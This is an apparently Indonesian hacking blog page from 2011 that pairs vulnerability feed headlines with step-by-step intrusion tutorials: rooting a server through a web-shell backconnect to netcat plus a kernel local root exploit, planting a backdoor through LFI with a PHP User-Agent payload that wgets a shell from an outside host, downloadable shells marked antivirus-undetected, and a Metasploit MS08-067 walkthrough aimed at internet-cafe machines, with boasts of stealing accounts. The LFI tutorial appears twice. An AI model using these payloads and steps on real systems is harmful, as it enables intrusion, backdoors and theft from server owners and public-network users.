April 2011

Sunday 17 April 2011

Exploit

EXPLOIT DATABASE

Fri, 11 Mar 2011 04:32:21 +0000: [webapps] – Oracle WebLogic Session Fixation Via HTTP POST
– [CVE: 2010-4437] – Exploit-DB updates
Thu, 10 Mar 2011 21:35:01 +0000: [remote] – Oracle MySQL for Microsoft Windows Payload Execution – Exploit-DB updates
Thu, 10 Mar 2011 21:28:26 +0000: [remote] – Novell iPrint Client ActiveX Control <= 5.52 Buffer Overflow
– [CVE: 2010-4321] – Exploit-DB updates
Thu, 10 Mar 2011 17:11:59 +0000: [webapps] – SmarterMail 7.3 and 7.4 Multiple Vulnerabilities – Exploit-DB updates
Thu, 10 Mar 2011 11:13:20 +0000: [webapps] – Keynect Ecommerce SQL Injection Vulnerability – Exploit-DB updates
Thu, 10 Mar 2011 11:07:21 +0000: [webapps] – Luch Web Designer Multiple SQL Injection Vulnerabilities – Exploit-DB updates
Thu, 10 Mar 2011 11:03:22 +0000: [dos] – Linux Kernel < 2.6.37-rc2 TCP_MAXSEG Kernel Panic DoS
– [CVE: 2010-4165] – Exploit-DB updates
Thu, 10 Mar 2011 00:02:49 +0000: [local] – FreeBSD <= 6.4 Netgraph Local Privledge Escalation Exploit
– [CVE: 2008-5736] – Exploit-DB updates
Wed, 09 Mar 2011 14:00:38 +0000: [webapps] – RecordPress 0.3.1 Multiple Vulnerabilities – Exploit-DB updates
Wed, 09 Mar 2011 10:44:20 +0000: [webapps] – maian weblog <= v4.0 remote blind SQL injection exploit – Exploit-DB updates
Wed, 09 Mar 2011 10:40:10 +0000: [webapps] – Esselbach Storyteller CMS System Version 1.8 SQL Injection Vulnerability – Exploit-DB updates
Tue, 08 Mar 2011 23:37:31 +0000: [webapps] – GRAND Flash Album Gallery 0.55 WordPress Plugin Multiple Vulnerabilities – Exploit-DB updates
Tue, 08 Mar 2011 22:13:38 +0000: [webapps] – RuubikCMS Version 1.0.3 Multiple Vulnerabilities – Exploit-DB updates
Tue, 08 Mar 2011 21:26:54 +0000: [dos] – Nokia N97 m3u Playlist Crash PoC – Exploit-DB updates
Tue, 08 Mar 2011 21:23:42 +0000: [dos] – Movavi VideoSuite 8.0 Movie Editor avi Local Crash PoC – Exploit-DB updates

PACKETSTORM DATABASE

11 March 2011: Oracle WebLogic Server 9 / 10 Session Fixation – Files ≈ Packet Storm
Oracle WebLogic server versions 9.0, 9.1, 9.2.4, 10.0.2, 10.3.2, and 10.3.3 suffers from a session fixation vulnerability.
10 March 2011: Air Contacts Lite Denial Of Service – Files ≈ Packet Storm
The Air Contacts Lite iPhone / iPod application suffers from a denial of service vulnerability.
10 March 2011: SmarterMail 7.x Cross Site Scripting / Shell Upload / Traversal – Files ≈ Packet Storm
SmarterMail version 7.x suffers from cross site scripting, shell upload and directory traversal vulnerabilities.
10 March 2011: Debian Security Advisory 2189-1 – Files ≈ Packet Storm
Debian Linux Security Advisory 2189-1 – Several vulnerabilities were discovered in the Chromium browser.
10 March 2011: KMPlayer 2.9.3 Stack Buffer Overflow – Files ≈ Packet Storm
KMPlayer version 2.9.3 stack buffer overflow proof of concept exploit.
10 March 2011: Windows Movie Maker 2.1 Stack Overflow – Files ≈ Packet Storm
Windows Movie Maker version 2.1 import AVI video stack overflow proof of concept exploit.
10 March 2011: Lazyest Gallery 1.0.26 Cross Site Scripting / Path Disclosure – Files ≈ Packet Storm
Lazyest Gallery version 1.0.26 suffers from cross site scripting and path disclosure vulnerabilities.
10 March 2011: Nagios 3.2.0 / 3.2.3 Cross Site Scripting – Files ≈ Packet Storm
Nagios versions 3.2.0 and 3.2.3 suffer from a cross site scripting vulnerability.
10 March 2011: PASSWORDS^11 Call For Papers – Files ≈ Packet Storm
The PASSWORDS^11 Call For Papers has been announced. It will be held at the University in Bergen (Norway) from June 7th through the 8th, 2011.
10 March 2011: PHP-Nuke 8.0 Cross Site Scripting – Files ≈ Packet Storm
PHP-Nuke versions 8.0 and below suffer from cross site scripting and anti-automation vulnerabilities.
10 March 2011: CosmoShop ePRO 10.05.00 Cross Site Scripting / SQL Injection – Files ≈ Packet Storm
CosmoShop ePRO version 10.05.00 suffers from cross site scripting and remote SQL injection vulnerabilities.
10 March 2011: HP Security Bulletin HPSBMA02629 SSRT100381 3 – Files ≈ Packet Storm
HP Security Bulletin HPSBMA02629 SSRT100381 3 – Potential security vulnerabilities have been identified with HP Power Manager (HPPM) running on Linux and Windows. One vulnerability could result in cross site request forgery (CSRF) leading to unauthorized administrative access. Another vulnerability could result in cross site scripting (XSS). Revision 3 of this advisory.
10 March 2011: Understanding The ARM Architecture – Files ≈ Packet Storm
Whitepaper called Understanding the ARM Architecture. Written in Portuguese.
10 March 2011: DLL Hijacking With Metasploit – Files ≈ Packet Storm
Whitepaper called DLL Hijacking with Metasploit. Written in Portuguese.
10 March 2011: OATH Toolkit 1.6.2 – Files ≈ Packet Storm
The OATH Toolkit attempts to collect several tools that are useful when deploying technologies related to OATH, such as HOTP one-time passwords. It is a fork of the earlier HOTP Toolkit.

OPENSOURCE VULNERABILITY DATABASE

: Apple Safari Script Variable Length DoS – Latest OSVDB Vulnerabilities
Apple Safari Script Variable Length DoS
: WSN Guest edit.php condition Parameter SQL Injection – Latest OSVDB Vulnerabilities
WSN Guest edit.php condition Parameter SQL Injection
: WSN Guest search.php Multiple Parameter SQL Injection – Latest OSVDB Vulnerabilities
WSN Guest search.php Multiple Parameter SQL Injection
: WSN Guest memberlist.php field Parameter SQL Injection – Latest OSVDB Vulnerabilities
WSN Guest memberlist.php field Parameter SQL Injection
: WSN Guest classes/member.php member() Function wsnuser Cookie SQL Injection – Latest OSVDB Vulnerabilities
WSN Guest classes/member.php member() Function wsnuser Cookie SQL Injection
: Comment Rating Plugin for WordPress ck-processkarma.php id Parameter SQL Injection – Latest OSVDB Vulnerabilities
Comment Rating Plugin for WordPress ck-processkarma.php id Parameter SQL Injection
: TTtuangou index.php id Parameter SQL Injection – Latest OSVDB Vulnerabilities
TTtuangou index.php id Parameter SQL Injection
: TTtuangou ajax.php email Parameter SQL Injection – Latest OSVDB Vulnerabilities
TTtuangou ajax.php email Parameter SQL Injection
: Citrix Licensing Administration Console Unspecified Access Bypass (2011-1101) – Latest OSVDB Vulnerabilities
Citrix Licensing Administration Console Unspecified Access Bypass (2011-1101)
: Citrix XenApp / XenDesktop Unspecified XML Service Interface Issue – Latest OSVDB Vulnerabilities
Citrix XenApp / XenDesktop Unspecified XML Service Interface Issue

SECURITYFOCUS DATABASE

Thu, 10 Mar 2011 00:00:00 +0000: Vuln: Oracle Weblogic CVE-2010-4437 Remote Session Fixation Vulnerability – SecurityFocus Vulnerabilities
Oracle Weblogic CVE-2010-4437 Remote Session Fixation Vulnerability
Thu, 10 Mar 2011 00:00:00 +0000: Vuln: WebKit Use-After-Free Remote Code Execution Vulnerability – SecurityFocus Vulnerabilities
WebKit Use-After-Free Remote Code Execution Vulnerability
Thu, 10 Mar 2011 00:00:00 +0000: Vuln: Cisco IOS CVE-2010-2828 H.323 Unspecified Denial of Service Vulnerability – SecurityFocus Vulnerabilities
Cisco IOS CVE-2010-2828 H.323 Unspecified Denial of Service Vulnerability
Thu, 10 Mar 2011 00:00:00 +0000: Vuln: OpenLDAP Multiple Security Bypass Vulnerabilities – SecurityFocus Vulnerabilities
OpenLDAP Multiple Security Bypass Vulnerabilities
: Bugtraq: [security bulletin] HPSBMA02629 SSRT100381 rev.3 – HP Power Manager (HPPM) Running on Linux and Windows, Cross Site Request Forgery (CSRF), Cross Site Scripting (XSS) – SecurityFocus Vulnerabilities
[security bulletin] HPSBMA02629 SSRT100381 rev.3 – HP Power Manager (HPPM) Running on Linux and Windows, Cross Site Request Forgery (CSRF), Cross Site Scripting (XSS)
: Bugtraq: Re: HTB22875: XSS in Lazyest Gallery wordpress plugin – SecurityFocus Vulnerabilities
Re: HTB22875: XSS in Lazyest Gallery wordpress plugin
: Bugtraq: Re: Cross-Site Scripting vulnerability in Nagios – SecurityFocus Vulnerabilities
Re: Cross-Site Scripting vulnerability in Nagios
: Bugtraq: Call for Papers: Passwords^11 – SecurityFocus Vulnerabilities
Call for Papers: Passwords^11
: More rss feeds from SecurityFocus – SecurityFocus Vulnerabilities
News, Infocus, Columns, Vulnerabilities, Bugtraq …

Klo sudah dapat, dibagi bagi ya.
Salam hangat untuk semuanya, banyak yang request bagaimana cara ngeroot target.
Apa sih tujuannya harus “ngeroot” atau mendapatkan akses root? Karena akses level “root” merupakan akses level tertinggi dalam UNIX, so dengan kita mendapatkan “root” maka anda bisa melakukan hal yang lebih banyak di server target.
Okelah klo begitu yuk kita mulai, beginilah cara ngeroot.
Langkah untuk ngeroot adalah:

Sediakan server / pc untuk menjalankan Netcat
Sediakan target yang sudah kita dapat dari (RFI/SHELLUPLOAD/LFI/DSB) yang safemode (OFF)
Sedikan juga shell injection tools (c99, r57, dsb) yang didalamnya tersedia fasilitas untuk backconnect / gunakan perl backconnect tools
Sediakan Netcat (NC) untuk menerima connection dari backconnect
Sediakan local root exploit yang sesuai dengan kernel target

Oke, kita mulai beraksi
Asumsikan bahwa:
IPHOSTSERVER ANDA = 100.100.100.100
PORT SERVER NETCAT ANDA: 10000
Langkah pertama cara ngeroot:
Pastikan bahwa Netcat sudah terinstall & Anda sudah menjalankan Netcat pada Server Anda.
Commandnya sangat sederhana: netcat -n -l -v -p PORT
Contoh: netcat -n -l -v -p 10000

binushacker@ourbox:~$ nc -n -l -v -p 10000
Listening on [any] 10000 …

Langkah kedua cara ngeroot:
Pastikan bahwa anda sudah melakukan upload c99 / r57 ke server dimana didalamnya terdapat fasilitas backconnect. Jadi kita tinggal masukkan IP server kita,
Jika anda menggunakan perl backconnect tools, anda cukup ketikkan perintah: perl backconnectortools.txt IPHOSTSEVERANDA PORT
Contoh:

perl backconnect.txt 100.100.100.100 10000

Langkah ketiga cara ngeroot:
Tunggulan sampai ada connection dari server target ke server anda, biasanya akan muncul pesan bahwa terdapat koneksi ke server anda dari target.
Contoh:

binushacker@ourbox:~$ nc -n -l -v -p 10000
Listening on [any] 10000 …
Connect to [195.13.10.210] from localhost [127.0.0.1] 10000
Linux www.target.com 2.6.16 #1 SMP Fri Jun 01 17:19:41 EST NEW 2007 i686 i686 i386 GNU/Linux
uid=48(apache) gid=48(apache) groups=48(apache)

Langkah ke-empat cara ngeroot:
Anda sudah terkoneksi ke target, disinilah anda harus pandai-pandai menggunakan command Unix. Anda bisa belajar lebih dahulu command” Unix server.
Apabila sudah terkoneksi, maka persiapkanlah LOCAL EXPLOIT UNTUK KERNEL SERVER, ada banyak tools untuk local disesuaikan dengan kebutuhan.
Karena kernel target adalah 2.6.16, maka kita akan menggunakan 2.6.16 -> raptor, raptor2, h0llyshit, prctl untuk exploitnya.
Informasi mengenai local exploit untuk masing” kernel bisa dicari google, kalau kata ulil gamal gunakan jari jemari anda untuk menemukannya

Oke kita lanjut, setelah itu kita wget file raptor, kita tempatkan di yang permissionnya bisa execute. Kita cari saja yang 777 (misal: /var/tmp).
Kemudian kita jalankan perintahnya: ./raptor
w00t: uid=0(root) gid=0(root) groups=0(root)
whoami
uid=0(root) gid=0(root) groups=0(root)
Buzz, selamat anda sudah mendapatkan root.

Priv8 shell and bypass tools

Download rar files	Description	Download txt files
r57.rar	R57 shell bypass linux and windows tools list path and rfi eval code	r57.txt

c99.rar	c99 shell coded by arabic hacker Spyn3t see you all files	cc99.txt

c99ud.rar	C99 shell undetecter versiyon coded by HBA for all antivirus undetected	c99ud.txt

bypass.rar	r57 shell 1.5 bypass version coded rus hack team Antichat	bypass.txt

safe0ver.rar	safe0ver bypass shell new list path tools	safe0ver.txt

shell all archive pls click to download your computer.

maap kan saya ya momod bila tread ini gak guna hapus aja ..
tapi saya memberanikan diri untuk membuat threat tutorial ini..setelah saya meminta izin sebelum nya , dan salah satu moderator XXX telah mengijinkan..

ok kita langsung saja..
yang mau saya share di sini ialah tutorial or cara mengupload shell dari target LFI dengan Tamper Data.

########################################

fucking the Web Apps [LFI attack edition]

____ __ __ __
/\ _`\ /\ \ __ /\ \__/\ \
\ \ \L\_\__ __ ___\ \ \/'\ /\_\ ___ __ \ \ ,_\ \ \___ __
\ \ _\/\ \/\ \ /'___\ \ , < \/\ \ /' _ `\ /'_ `\ \ \ \/\ \ _ `\ /'__`\
\ \ \/\ \ \_\ \/\ \__/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \ \ \ \_\ \ \ \ \/\ __/
\ \_\ \ \____/\ \____\\ \_\ \_\ \_\ \_\ \_\ \____ \ \ \__\\ \_\ \_\ \____\
\/_/ \/___/ \/____/ \/_/\/_/\/_/\/_/\/_/\/___L\ \ \/__/ \/_/\/_/\/____/
/\____/
\_/__/
__ __ __ ______ Author: Luchifer
/\ \ __/\ \ /\ \ /\ _ \
\ \ \/\ \ \ \ __\ \ \____ \ \ \L\ \ _____ _____ ____
\ \ \ \ \ \ \ /'__`\ \ '__`\ \ \ __ \/\ '__`\/\ '__`\ /',__\
\ \ \_/ \_\ \/\ __/\ \ \L\ \ \ \ \/\ \ \ \L\ \ \ \L\ \/\__, `\
\ `\___x___/\ \____\\ \_,__/ \ \_\ \_\ \ ,__/\ \ ,__/\/\____/
'\/__//__/ \/____/ \/___/ \/_/\/_/\ \ \/ \ \ \/ \/___/
\ \_\ \ \_\
\/_/ \/_/

-=[ upload Shell via Target LFI dengan Tamper Data ]=-

1 - Pendahuluan
2 - Mencari Target LFI
3 - Memeriksa apakah proc / self / environ dapat diakses
4 - Mengupload code shell injection
5 - Akses shell or backdoor kita

=[1]= Pendahuluan

Dalam tutorial ini saya akan coba menunjukkan bagaimana Mencari or mendapatkan target LFI , setelah itu bagai bagaimana kita memanfaat kan target tersebut dan mengupload shell injection (backdoor) kedalam nya.

=[2]= Mencari Target LFI
=> Sekarang saya akan coba memberikan sample or contoh bagaimana cara menemukan target LFI , lets check it.
example: http://www.target.com/index.php?page=blablabla

=> sekarang kita coba mengganti file setelah ?page= (blablabla) dengan ../
example: http://www.target.com/index.php?page=../

Jika kita mendapatkan pesan error seperti ini:
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1330

website or target tersebut kemungkinan besar can be attack with LFI

untuk memastikan nya kita masuk ke step berikut nya yaitu mencoba meng access file /etc/passwd , for this step Lets make a request:

example: http://www.target.com/index.php?page=../...etc/passwd

jika kita masih mendapat kan pesan error yg sama seperti di atas , berarti kita perlu or coba menambahkan beberapa directory (../../) lagi sampai pesan error hilang dan kita success meng access or menampilkan isi dari file /etc/passwd

contoh klw success akan muncul seperti ini: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

=[3]=Memeriksa apakah proc/self/environ dapat diakses

sekarang mari kita periksa atau check apakah proc/self/environ dapat di access dengan cara mengganti /etc/passwd dengan proc/self/environ

contoh: http://www.target.com/index.php?page=../...etc/passwd <= change etc/passwd with proc/self/environ

it will be like this: http://www.target.com/index.php?page=../...lf/environ

jika success atau proc/self/environ dapat di access , maka kita akan mendapat pesan seperti berikut:

DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at http://www.website.com Port 80

jika gagal atau blank atau error berarti proc/self/environ tidak dapat di access

NB: kemungkinan lain yg menyebab kan proc/self/environ tidak dapat di access ialah web or target kita menggunakan OS (operating system) FreeBSD

=[4]= Mengupload code shell injection (backdoor)

Di step ini kita akan mencoba mengupload shell injection (backdoor) kita ke dalam target yg tadi atau target yg proc/self/environ dapat di access.
Bagaimana caranya ?
Di sinilah peran Tamper data di perlukan.Apa itu Tamper Data ?

NB: Tamper data ialah salah satu Add-ons pada browser mozila yg dapat kita gunakan untuk mengganti user agent atau HTTP Header.

Bagaimana cara menggunakan nya ?
Download dan install terlebih dahulu Tamper Data pada Add-ons mozila anda download here => https://addons.mozilla.org/en-US/firefox/addon/966

setelah tamper data di install , buka tamper data dan pada User-Agent masukan command code sebagai berikut:

<?system('wget http://arizonafusion.com/wp-content/r58.txt -O shell.php');?>

NB: arizonafusion dapat anda ganti dengan link injection anda sendiri jika anda punya atau tidak ingin memakai injection tersebut

command code tersebut akan men-download file r58.txt dari arizonafusion.com dan otomatis tersimpan dengan nama shell.php.
jika tidak bekerja coba exec () karena sistem () dapat dinonaktifkan pada webserver dari php.ini

=[5]= Check or Akses shell backdoor kita

Sekarang mari kita periksa apakah script shell (backdoor) kita berhasil atau tersedia pada web target tadi dengan cara membuka:

http://www.target.com/shell.php

Jika success maka kita akan melihat tampilan backdoor shell kita

This Tutorial is writen for educational purpose only , Author will be not responsible if any damage.

Greats: JosS (hack0wn), h4cky0u team , AL-MARHUM , sp3x (securityreason) , r0073r & 0x1D (inj3ct0r) , [D]eal [C]yber , exploit-db

####################=[E0F]=####################

_____________________________________________________________________________________________
Credit By me.......................

Ditunggu commentnya
yang gak comment maho :))

, Joke !!!

Ok kita langsung saja..
yang mau saya share di sini ialah tutorial or cara mengupload shell dari target LFI dengan Tamper Data.
########################################
fucking the Web Apps [LFI attack edition]

__________ .__ Author: Mygo __
\______ \| | _____ ____ | | __ _____ ___.__. ____ ____
| | _/| | \__ \ _/ ___\ | |/ / / \< | | / ___\ / _ \
| | \| |__ / __ \_\ \___ | < | Y Y \\___ |/ /_/ >( <_> )
|______ /|____/(____ / \___ >|__|_ \|__|_| // ____|\___ / \____/
\/ \/ \/ \/ \/ \/ /_____/
-=[ upload Shell via Target LFI dengan Tamper Data ]=-
1 – Pendahuluan
2 – Mencari Target LFI
3 – Memeriksa apakah proc / self / environ dapat diakses
4 – Mengupload code shell injection
5 – Akses shell or backdoor kita
=[1]= Pendahuluan
Dalam tutorial ini saya akan coba menunjukkan bagaimana Mencari or mendapatkan target LFI , setelah itu bagai bagaimana kita memanfaat kan target tersebut dan mengupload shell injection (backdoor) kedalam nya.
=[2]= Mencari Target LFI
=> Sekarang saya akan coba memberikan sample or contoh bagaimana cara menemukan target LFI , lets check it.
example: www[dot]target[dot]com/index.php?page=blablabla
=> sekarang kita coba mengganti file setelah ?page= (blablabla) dengan ../
example: www[dot]target[dot]com/index.php?page=../
Jika kita mendapatkan pesan error seperti ini:
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1330
website or target tersebut kemungkinan besar can be attack with LFI .
untuk memastikan nya kita masuk ke step berikut nya yaitu mencoba meng access file /etc/passwd , for this step Lets make a request:
example: www[dot]target[dot]com/index.php?page=../…etc/passwd
jika kita masih mendapat kan pesan error yg sama seperti di atas , berarti kita perlu or coba menambahkan beberapa directory (../../) lagi sampai pesan error hilang dan kita success meng access or menampilkan isi dari file /etc/passwd

contoh klw success akan muncul seperti  ini: root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin  daemon:x:2:2:daemon:/sbin:/sbin/nologin  adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin  sync:x:5:0:sync:/sbin:/bin/sync  shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt  mail:x:8:12:mail:/var/spool/mail:/sbin/nologin  news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:
/sbin/nologin  operator:x:11:0:operator:/root:/sbin/nologin  games:x:12:100:games:/usr/games:/sbin/nologin  test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP
User:/var/ftp:/sbin/nologin  nobody:x:99:99:Nobody:/:/sbin/nologin

=[3]=Memeriksa apakah proc/self/environ dapat diakses
sekarang mari kita periksa atau check apakah proc/self/environ dapat di access dengan cara mengganti /etc/passwd dengan proc/self/environ
contoh: www[dot]target[dot]com/index.php?page=../…etc/passwd <= change etc/passwd with proc/self/environ
it will be like this: www[dot]target[dot]com/index.php?page=../…lf/environ
jika success atau proc/self/environ dapat di access , maka kita akan mendapat pesan seperti berikut:

DOCUMENT_ROOT=/home/sirgod/public_html  GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html,
application/xml;q=0.9,  application/xhtml+xml, image/png, image/jpeg, image/gif,  image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac  HTTP_HOST=www[dot]website[dot]com
HTTP_REFERER=http://www[dot]website[dot]com/index.php?view=../../../../../../etc/passwd  HTTP_USER_AGENT=Opera/9.80
(Windows NT 5.1; U; en) Presto/2.2.15  Version/10.00 PATH=/bin:/usr/bin  QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200  REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET  REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron  SCRIPT_FILENAME=/home/sirgod/public_html/index.php  SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x  SERVER_ADMIN=webmaster@website[dot]com
SERVER_NAME=www[dot]website[dot]com  SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37  (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1  mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at http://www[dot]website[dot]com  Port 80

jika gagal atau blank atau error berarti proc/self/environ tidak dapat di access
NB: kemungkinan lain yg menyebab kan proc/self/environ tidak dapat di access ialah web or target kita menggunakan OS (operating system) FreeBSD
=[4]= Mengupload code shell injection (backdoor)
Di step ini kita akan mencoba mengupload shell injection (backdoor) kita ke dalam target yg tadi atau target yg proc/self/environ dapat di access.
Bagaimana caranya ?
Di sinilah peran Tamper data di perlukan.Apa itu Tamper Data ?
NB: Tamper data ialah salah satu Add-ons pada browser mozila yg dapat kita gunakan untuk mengganti user agent atau HTTP Header.
Bagaimana cara menggunakan nya ?
Download dan install terlebih dahulu Tamper Data pada Add-ons mozila anda download here => //addons[dot]mozilla[dot]org/en-US/firefox/addon/966
setelah tamper data di install , buka tamper data dan pada User-Agent masukan command code sebagai berikut:
NB: arizonafusion dapat anda ganti dengan link injection anda sendiri jika anda punya atau tidak ingin memakai injection tersebut

command code tersebut akan men-download file r58.txt dari arizonafusion.com dan otomatis tersimpan dengan nama shell.php.
jika tidak bekerja coba exec () karena sistem () dapat dinonaktifkan pada webserver dari php.ini
=[5]= Check or Akses shell backdoor kita
Sekarang mari kita periksa apakah script shell (backdoor) kita berhasil atau tersedia pada web target tadi dengan cara membuka:
www[dot]target[dot]com/shell.php
Jika success maka kita akan melihat tampilan backdoor shell kita

This Tutorial is writen for educational purpose only , Author will be not responsible if any damage.

Network Security (Hacking)…
kali ini saya akan memapaparkan tentang bagaimana cara kita menyusup ke komputer yang terinstall windows XP service pack 1 sampai dengan 3..
pastikan juga kalian mempunya DEEPFREEZE REMOVER untuk itu bisa kalian lihat di postingan saya sebelumnya.kenapa saya menganjurkan kalian mempunya deepfreeze remover, karena bisa saja warnet tempat kalian bermain di lock installation new softwarenya.
tetapi pasti teman teman menanyakan 2 pertanyaan kepada saya tentang:
1.> Keuntungan Apa yang di dapatkan dari menyusup ke komputer orang lain :
*.> Pengetahuan yang baru yang bisa jadi berguna untuk anda
*.> sebagai sarana perkerjaan baru…ya iaaalahh..gimana Coba klo kita berhasil menguasai jaringan di dalam suatu fasilitas umum ( wiffii gratisan, warkop ataupun Warnet )..wahhh bisa anda bayangkan kan…
kita bisa mengambil chips orang dengan mudah dan menjualNYa dengan senang hati….. karna AKUN ANDA ADA PADA KAMI …hehehhehe ( tapi saya tidak begitu loh..hanya sekedar share )… eh satu hal lagi, anda bisa memformat hardisk Laptop pengguna wiffi dengan Mudah..huahuahuahuahuahahua…
2.> bagaimana caranya, ..hehehe AJAR DULUEE …hehhe pasti begitu TOoo… huahuahuahuahuahuahuahuahua….
so lanjut ke topik Utama….hiaaattt huattttCCiiiimmmss

yang kita  mesti sediakan adalah beberapa alat bantu , yang bisa anda dapatkan  secara GRATIS...
- OS BACKTRACK ( terserah Backtrack 3 Or 4 )  hehehehe
- John the Ripper
- pwdump6 ( http://www[dot]foofus[dot]net/fizzgig/pwdump/ )
- TROJAN  Buatan Sendiri atau keylogeer atau apalahhhh
- kopi panas
- pisang  goreng atau Roti bakar ( Yang KEju Nahh )
- ROKOK SAMPOERNA ^_^!!!  huahuahua

Ok Lets Begin
sekarang Kita mulai exploited memakai metasploit yang sudah include di backtrack
Untuk lebih memahami tentang Xploited , silahkan kunjungi http://www[dot]metasploit[dot]com/, karna saya tidak akan membahas bahasan Perintah yang akan kita gunakan
Pertama kita masuk dulu ke konsole( itueee Klo di windows namanYa CMD ) , nah klo sudah terbuka, ketik :
uing~BT#msfconsole
Untuk Melihat Lihat list exploits-nya , gunakan perintah :

msf > show  exploits
windows/smb/ms05_039_pnp  Microsoft Plug and Play Service Overflow
windows/smb/ms06_025_rasmans_reg  Microsoft RRAS Service RASMAN Registry Overflow
windows/smb/ms06_025_rras  Microsoft RRAS Service Overflow
windows/smb/ms06_040_netapi  Microsoft Server Service NetpwPathCanonicalize Overflow
windows/smb/ms06_066_nwapi  Microsoft Services MS06-066 nwapi32.dll
windows/smb/ms06_066_nwwks  Microsoft Services MS06-066 nwwks.dll
windows/smb/ms08_067_netapi  Microsoft Server Service Relative Path Stack Corruption

Wokeh,..sekarang kita Mulai menScan Komputer Target Kita…heehhehehheheh tapi untuk lebih menyakinkan saya melihat IP Kita,.huahuahua ternyata ip kita ni bagus Juga Yah : 192.168.1.20 :

msf > sudo  nmap -v -sS -A -O 192.168.1.28
[*]  exec: sudo nmap -v -sS -A -O 192.168.1.28
[sudo]  password for test:Starting  Nmap 4.62 (  http://nmap.org/ )  at 2009-03-21 23:50  CIT
Initiating ARP Ping  Scan at 23:50
Scanning 192.168.1.28  [1 port]
Host 192.168.1.28  appears to be up ...  good.
Interesting ports on 192.168.1.28:
Not shown:  1712 closed ports
PORT  STATE SERVICE VERSION
135/tcp open  msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds  Microsoft Windows XP microsoft-ds <------
MAC Address: 00:1E:8C:67:59:F9 (Asustek Computer)
Device type: general  purpose
Running:  Microsoft Windows XP
OS  details: Microsoft Windows 2000 SP4,  or Windows XP SP2 or SP3
Network Distance: 1  hop
TCP Sequence  Prediction: Difficulty=258 (Good  luck!)
IP ID  Sequence Generation: Incremental
Service Info: OS: Windows

Dari hasil scan kita ketahui bahwa kemungkinan OS-nya menggunakan OS Windows XP dengan port 445-nya terbuka ( lihat Yang ada Tanda Panah <—- ). Mari kita coba masuk ke komputer ini dengan menggunakan exploit windows/smb/ms08_067_netapi.

msf > use  windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >
Lihat  opsi dari exploit ini dengan mengetikkan show options :
msf exploit(ms08_067_netapi) >  show options
Module options:
Name Current Setting Required Description
----  --------------- -------- -----------
RHOST yes The  target address
RPORT 445 yes  Set the SMB service port
SMBPIPE  BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id  Name
-- ----
0 Automatic Targeting

Dari opsi diatas, maka kita perlu set terlebih dahulu RHOST ( komputer target) dengan mengetikkan :

1 2	`msf exploit(ms08_067_netapi)` `>` `set` `rhost` `192.168.1.28` `rhost` `=>` `192.168.1.28`

Untuk RPORT, kita tidak perlu melakukan setting apa-apa karena vulnerability ini memang mengeksploitasi vulnerability di port 445. Untuk exploit target diisi dengan OS komputer target. Dalam langkah ini kita menggunakan angka 0 yang berarti automatic target. Untuk melihat OS target apa saja, ketik :

msf exploit(ms08_067_netapi) >  show targets
Exploit targets:
Id Name
-- ----
